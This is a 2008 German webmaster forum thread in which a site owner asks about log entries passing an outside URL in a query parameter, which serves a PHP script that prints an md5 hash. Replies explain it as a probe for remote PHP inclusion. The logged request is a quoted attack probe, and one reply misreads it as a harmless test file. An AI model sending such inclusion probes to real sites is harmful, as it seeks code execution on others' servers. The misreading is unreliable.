Anzeige - [Hier werben / Mediadaten]
(?) Tags raten (?) (edit)
 
Reply to this topicStart new topicStart Poll
> URL Aufrufe in den Log Files
morevideo
Geschrieben am: Mo 4.02.2008, 18:52
Report PostQuote Post

AyomRank 4
********

Gruppe: Member (aktiv)
Beiträge: 55
Mitglied seit: 25.02.2007


Hallo,

ich entdecke in den Logfiles des öfteren Einträge wie diesen hier:


GET /index.html?q=http://www.felixtorresycia.com/admin/correo/enaq/ecib/

Wenn man die fremde URL aufruft, findet man ein kurzes PHP Script in Klarschrift:
<?php echo md5("just_a_test");?>

Muss ich mir da Sorgen machen? unsure.gif

Und wenn ja, was mach ich da gegen? blink.gif

Schönen Dank vorab.
Top
PMEmail Poster
Top
 
 
nitrit
#2 Geschrieben am: Mo 4.02.2008, 18:55 (+00:03)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 259
Mitglied seit: 8.08.2007


da probiert jemand über q ein php-script zu übergeben, dass dein script dann hoffentlich ausführt....

was du dagegen machst? nichts, wenn du dir sicher bist, dass dein script keine solchen lücken hat


--------------------
Top
PMEmail Poster
Top
 
jeronimo
#3 Geschrieben am: Mo 4.02.2008, 19:06 (+00:11)
Report PostQuote Post

AyomRank 4
********

Gruppe: Member (aktiv)
Beiträge: 105
Mitglied seit: 19.12.2007


http://

da am besten mal nach "GET" schauen
Top
PMEmail Poster
Top
 
morevideo
#4 Geschrieben am: Mo 4.02.2008, 19:16 (+00:09)
Report PostQuote Post

AyomRank 4
********

Gruppe: Member (aktiv)
Beiträge: 55
Mitglied seit: 25.02.2007


jeronimo: Vielen Dank, die GET Methode ist mir schon bekannt,
es ging mir vielmehr um das Unterschieben eines php scriptes und die Deutung desselben als
Sicherheitslücke und Vorbote eines wie auch immer gearteten Angriffs.

nitrit: Danke, ich werd das unter Beobachtung halten.
Top
PMEmail Poster
Top
 
jeronimo
#5 Geschrieben am: Mo 4.02.2008, 20:11 (+00:55)
Report PostQuote Post

AyomRank 4
********

Gruppe: Member (aktiv)
Beiträge: 105
Mitglied seit: 19.12.2007


scheint eine test datei die bei md5 bei einer Verbindung verwendet und abgelegt wird - wie die datei heißt ist vermutlich konfigurationsabhängig . . .

MD5

Top
PMEmail Poster
Top
 
Thema wird von 0 Benutzer(n) gelesen (0 Gäste und 0 anonyme Benutzer)
0 Mitglieder:
Trackback-Url: http://www.ayom.com/track/t/22833

Topic Options Reply to this topicStart new topicStart Poll

 


> Ähnliche Themen
Windows Movie Maker für .3gp files fox 452 1 So 22.06.2008, 23:06
Kostenlose PSD Files Platus 225 2 Fr 14.03.2008, 14:00
6 Webdesign - PSD Files Gratis Platus 256 2 Mi 20.02.2008, 18:17
[Suche] Youtubeportal für MP3 Files woody 150 2 Fr 28.12.2007, 14:27
Komische Zeichen in Files spaceman007 214 2 Do 12.07.2007, 16:07
Probleme mit Zanox CSV Files Stefu 778 9 Fr 3.11.2006, 16:18
Verzeichnis 'files' / 'atd'? Suppi 310 1 Mi 12.04.2006, 21:36
Alle Files in einem Verzeichnis includen radarin 476 10 Mo 27.02.2006, 00:57
Liest Google CSS Files? Alain Aubert 1816 3 So 13.11.2005, 11:42
Erstellen von PDF Files... milkboy 2002 6 Di 4.10.2005, 14:31




Anzeige - [Hier werben / Mediadaten]



Anzeigen


[Hier werben / Mediadaten]